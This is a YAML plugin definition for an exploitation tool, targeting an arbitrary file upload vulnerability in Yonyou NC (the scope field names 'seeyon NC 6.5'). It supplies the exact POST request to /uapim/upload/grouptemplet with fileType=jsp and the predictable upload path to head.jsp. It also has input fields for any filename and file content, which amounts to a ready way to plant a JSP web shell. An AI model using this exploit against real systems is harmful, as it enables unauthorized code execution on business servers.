info:
    app: 用友NC
    name: 202207_grouptempletUpload
    author: lz520520
    plugin_version: 1.0.0
    disclosure_date: "2022-07-21"
    create_date: "2024-10-06 09:39:49"
    update_date: "2024-10-06 09:39:49"
    scope: seeyon NC 6.5
    description: 任意文件上传
    detail: |-
        输入文件名以及内容，点击上传即可。
        groupId影响上传路径。

        PS: 其实只要文件后缀即可，文件名固定是head.jsp
        路径拼接参考：uapim/static/pages/templet/[groupid]/head.jsp
    payload: POST /uapim/upload/grouptemplet?fileType=jsp&groupid=1 HTTP/1.1
    reference: https://www.seebug.org/vuldb/ssvid-99547
    vul_type: 文件上传
payloads:
    - name: upload1
      alias: 文件上传
      params:
          - key: filename
            title: 文件名
            param_type: edit
            default_value: ""
            required: true
          - key: content
            title: 内容
            param_type: textarea
            default_value: ""
          - key: groupId
            title: groupId
            param_type: edit
            default_value: "1"
            required: true
